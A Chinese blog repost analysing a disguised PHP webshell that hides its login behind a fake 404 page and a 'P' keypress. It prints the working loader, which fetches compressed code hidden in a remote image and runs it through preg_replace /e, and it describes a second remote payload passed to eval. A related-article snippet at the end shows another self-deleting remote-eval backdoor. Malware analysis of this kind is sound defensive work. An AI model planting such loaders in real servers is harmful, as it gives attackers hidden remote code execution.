一款猥琐的PHP后门分析

最新推荐文章于 2024-02-03 15:19:32 发布
最新推荐文章于 2024-02-03 15:19:32 发布
阅读量5.9k 收藏 4
点赞数
分类专栏: php

Webshell代码如下:

<?php
error_reporting(0);
session_start();
header("Content-type:text/html;charset=utf-8");if(empty($_SESSION['api'])) $_SESSION['api']=substr(file_get_contents(sprintf('%s?%s',pack("H*",'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067'),uniqid())),3649);
@preg_replace("~(.*)~ies",gzuncompress($_SESSION['api']),null);
?>

关键看下面这句代码,

sprintf('%s?%s',pack("H*",'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067'),uniqid())

这里执行之后其实是一张图片,解密出来的图片地址如下:

http://7shell.googlecode.com/svn/make.jpg?53280b00f1e85

然后调用file_get_contents函数读取图片为字符串,然后substr取3649字节之后的内容,再调用gzuncompress解压,得到真正的代码。最后调用preg_replace的修饰符e来执行恶意代码的。这里执行以下语句来还原出恶意样本代码,

<?php
echo gzuncompress(substr(file_get_contents(sprintf('%s?%s',pack("H*",'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067'),uniqid())),3649));
?>

如图所示:

分析这段代码,发现这是一个伪装的404木马(这里实在是太猥琐了…),其实整个webshell就一个class外加三个function,如图

首先我先看一下它的前端html代码,其中有这么一段js程序

document.onkeydown = function(e) {
vartheEvent = window.event || e;      
var code = theEvent.keyCode || theEvent.which; 
if (80 == code) {
$("login").style.display = "block"
}
}

这里它用document.onkeydown获取用户敲击键盘事件,当code等于80的时候显示login这个div,这里查询了一下keyCode的对照表,查到80对应p和P键

所以触发webshell登陆需要按p键(不按P键页面就是一个空白页,看不到登陆框),如图所示:

再回到服务端php代码中,可以看到程序用的是对称加密,并且将登陆密码作为加密key,代码如图所示:

再看init()的逻辑

如图所示,先看这句代码

$true = 
@gzuncompress(gzuncompress(Crypt::decrypt(pack('H*',  '789c63ac0bbec7b494f12cdb02f6dfac3f833731cf093e163a892990793ebf0a9f1c6b18bb68983b3b47a022002a840c59'), $_POST['key'], true)));

根据这个解密逻辑我们可以推出,这里其实是将字符串true做了以下加密处理,

unpack('H*',Crypt::encrypt(gzcompress(gzcompress('true')),$_POST['key'] , true))

所以当输入正确密码的时候@gzuncompress返回字符串true,然后程序调用setcookie给客户端返回$_COOKIE[‘key’],然后值得提一下的是后面这个exit('{"status":"on"}'),这里它与前端代码联系很紧密,我们看前端有个callback函数,如下

function callback() {
	varjson = eval("(" + this.responseText + ")");
if (json.status=='on'){
window.location.reload();
return;
    }
	if (json.notice) {
		$("notice").style.display = "block";
		$("notice").innerHTML = json.notice;
sideOut();
	}
}

这里执行exit('{"status":"on"}')会返回json串{"status":"on"},此时前端js代码classback()获取到此响应会执行window.location.reload()刷新,再次请求正好带上前面获取的cookie,然后执行判断COOKIE的逻辑,如图所示

这里跟前面POST的逻辑一样,下面当判断为’true’以后,这里又请求了一张图片,pack出来地址为http://2012heike.googlecode.com/svn/trunk/code.jpg,然后调用_REQUEST获取图片内容,解密解压之后再eval,分析之后发现code.jpg中才是真正的webshell经过加密压缩之后的内容。这里我跟踪了一下代码打印出了真正执行的webshell的内容,

登陆成功之后如图所示:

总结:

这是一个高度隐蔽的webshell,它没有在其代码中用到一些危险函数和敏感字,而是将真正的shell内容经过层层加密处理之后保存到图片当中,丢到服务器上只留下一个url,并且url还是经过加密处理的,所以对外看没有任何特征可寻,过掉了大多数waf以及杀软的查杀。。作者的利用思路新颖,并且前端后端结合紧密,代码精简,各种奇技淫巧,有别于常见的webshell后门,令人佩服!

转载地址:http://www.freebuf.com/articles/web/29307.html

会飞的胖达喵
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
实战分析PHP大马隐藏后门(案例一)的-PHP大马
07-07
实战分析PHP大马隐藏后门(案例一)的-PHP大马
PHP后门新玩法:一款猥琐PHP后门分析
01-30
近日,360网站卫士安全团队近期捕获一个基于PHP实现的webshell样本,其巧妙的代码动态生成方式,猥琐的自身页面伪装手法,让我们在分析这个样本的过程中感受到相当多的乐趣。接下来就让我们一同共赏这个奇葩的Webshell吧。Webshell代码如下:关键看下面这句代码,这里执行之后其实是一张图片,解密出来的图片地址如下:然后调用file_get_contents函数读取图片为字符串,然后substr取3649字节之后的内容,再调用gzuncompress解压,得到真正的代码。最后调用preg_replace的修饰符e来执行恶意代码的。这里执行以下语句来还原出恶意样本代码,如图所示:分析这段
php自动生成后门代码,PHP常见代码执行后门函数
xcdm100的博客
02-03 519
应用程序在调用一些能够将字符串转换为代码的函数(例如php中的eval中),没有考虑用户是否控制这个字符串,将造成代码执行漏洞。,按照 php的格式,表达式在两个/之间,如果在表达式末尾加上一个 e,则第二个参数就会被当做 php代码执行。call_user_func_array(): 方法同上,只是第二个参数要是一个数组,作为第一个参数的参数。函数的第一个参数是被调动的函数,剩下的参数(可有多个参数)是被调用函数的参数。调用回调函数,并把一个数组参数作为回调函数的参数。为数组的每个元素应用回调函数。
装了shopNC B2B2C,注册了却无法登入解决办法
06-09
装了shopNC B2B2C,注册了却无法登入解决办法
pw的一个放后门的方法分析
12-17
pw的一个放后门的方式 data\bbscache\admin_record.php是记录后台登陆和操作的,我们看看是怎么操作这个文件的: admin\admincp.php: $bbsrecordfile=D_P.”data/bbscache/admin_record.php”; if(!file_exists($bbsrecordfile)){ writeover($bbsrecordfile,”<?php die;?>\n”); }//这个if只是说如果不存在admin_record.php 就用代码生成一个 如果我们只是编辑admin_record.php 把<?php die;?>这
实战分析PHP大马隐藏后门——(案例二)的PHP大马
07-07
实战分析PHP大马隐藏后门——(案例二)的PHP大马
php 后门代码_分析一段PHP后门代码,很恶心
weixin_35936375的博客
03-09 232
[PHP] 纯文本查看 复制代码if($_GET['ac']=="ok"){ echo 'OK';function downFile($url,$path){$arr=parse_url($url);$fileName=basename($arr['path']);$file=file_get_contents($url);}downFile("这里是网络下载地址,防止小人,直接删除...
猥琐PHP后门分析
橙虚缘空间
04-18 1124
Webshell代码如下:&lt;?php error_reporting(0); session_start(); header("Content-type:text/html;charset=utf-8");if(empty($_SESSION['api'])) $_SESSION['api']=substr(file_get_contents(sprintf('%s?%s',pack("H*...
一款php后门 phpspy的情况
可爱是名词吗?
10-29 4242
关于phpspy这款php后门可以查看! 很多人也许因为没有使用过,所以不知道作用,我详细的说明一下! 把几个功能解释下,首先从原先版本里就有的开始说!! ************************************************************ 1 设置部分..... 首先,用记事本打开下载完毕的phpspy.php会看到相关设置,按着注释修改就可以了,admin[
红日靶场7
m0_58595840的博客
01-11 1174
内网渗透
[转]shopnc 版权问题
liNewman的博客
07-27 601
[转]shopnc 版权问题 (之前怀疑是不是 核心加密文件留了后门) 原文:http://bbs.33hao.com/thread-11613-1-1.html 相信各位使用过NC的朋友,多多少少收到过律师函,把一堆人吓尿了,原因你使用了盗版,大哥都要吃饭可以理解 #网络那么大,他怎么能快速定位到您的,原因很简单 搜索引擎,NC在开发...
ShopNC电商平台系统最新破解版
11-10
+-------------------------+ ShopNC【B2B2C】电商系统 +-------------------------+ ShopNC【B2B2C】电商系统是目前世界最领先的电商运营平台,特有的供应商入驻、买卖家分离、 佣金结算、售后服务体系等功能更全面诠释了当今电子商务网站运营模式及未来发展方向;诸多新增功能也从根源上 解决了电商企业普遍存在的推广、招商、盈利等问题;平台自营与供应商店铺共存模式,极大的丰富了平台商品。 新系统同时升级优化了CMS,圈子,微商城等模块,完善电商企业纵向深入发展;数据分析统计系统与手机客户端 更加立体化的设计,确保电商企业在市场竞争中领先一步。 +----------------------------------+ 环境要求及操作系统要求 +----------------------------------+ 一、ShopNC【B2B2C】电商系统具备跨平台特性,可运行于 Linux/FreeBSD/Unix 及微软 Windows 2000/2003/XP/NT 等各种操作系统环境下。我们已在软件中针对上述操作系统做了大量的测试和实地检验,保证 ShopNC【B2B2C】 电商系统可以在上述系统中安全稳定的运行,但您仍然需要做好服务器操作系统级的安全防备措施。 例如 Windows 用户需更改 MySQL for Windows 的初始 root 密码,避免跨目录的文件读写. 类Unix 用户需避免 使用过于简单的密码,避免跨用户目录的文件读写,做好服务器上其他相关软件(如 Sendmail、ftpd、httpd)等的安全防范,使用较新的软件版本等。 如果您租用虚拟主机,一般正规和技术力量较强的虚拟主机提供商会已经做好操作系统的各项准备,用户可不必 关注此部分。
php后门查询工具
11-03
php源码修改工具,欢迎分享,有需要的下载把,请大家给个好评,谢谢了
余闻同学录3.2b4破解版完美去后门版源码
12-04
余闻同学录3.2b4破解版完美去后门版源码
捡了一个非常淫荡的PHP后门,给跪了
weixin_30606461的博客
01-23 2811
<?php unlink($_SERVER['SCRIPT_FILENAME']); ignore_user_abort(true); set_time_limit(0); $remote_file = 'http://xxx/xxx.txt'; while($code = file_get_contents($remote_file)){ @eval($code); sleep...
那些强悍的PHP一句话后门
ncafei的博客
01-19 6777
http://www.freebuf.com/articles/web/9396.html 我们以一个学习的心态来对待这些PHP后门程序,很多PHP后门代码让我们看到程序员们是多么的用心良苦。 强悍的PHP一句话后门 这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有
spring java图片上传源码.rar
最新发布
04-26
源码实现了图片上传功能,可供相关功能开发的小伙伴参考学习使用。
新入职员工工作总结范文大全(篇).docx
04-26
工作总结,新年计划,岗位总结,工作汇报,个人总结,述职报告,范文下载,新年总结,新建计划。
本项目内容为《SpringBoot 2.X 基础教程》配套源码.zip
04-26
提供的源码资源涵盖了安卓应用、小程序、Python应用和Java应用等多个领域,每个领域都包含了丰富的实例和项目。这些源码都是基于各自平台的最新技术和标准编写,确保了在对应环境下能够无缝运行。同时,源码中配备了详细的注释和文档,帮助用户快速理解代码结构和实现逻辑。 适用人群: 这些源码资源特别适合大学生群体。无论你是计算机相关专业的学生,还是对其他领域编程感兴趣的学生,这些资源都能为你提供宝贵的学习和实践机会。通过学习和运行这些源码,你可以掌握各平台开发的基础知识,提升编程能力和项目实战经验。 使用场景及目标: 在学习阶段,你可以利用这些源码资源进行课程实践、课外项目或毕业设计。通过分析和运行源码,你将深入了解各平台开发的技术细节和最佳实践,逐步培养起自己的项目开发和问题解决能力。此外,在求职或创业过程中,具备跨平台开发能力的大学生将更具竞争力。 其他说明: 为了确保源码资源的可运行性和易用性,特别注意了以下几点:首先,每份源码都提供了详细的运行环境和依赖说明,确保用户能够轻松搭建起开发环境;其次,源码中的注释和文档都非常完善,方便用户快速上手和理解代码;最后,我会定期更新这些源码资源,以适应各平台技术的最新发展和市场需求。
使用PHP写一个后门监控代码
02-21
我不熟悉PHP,但是我可以尝试给你一些建议:1.熟悉PHP语言基础;2.研究不同类型的后门...3.尝试编写一个简单的后门代码;4.了解有关安全合规的相关知识;5.熟悉文件处理,以及相关的安全流程。希望我的建议能帮到你。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值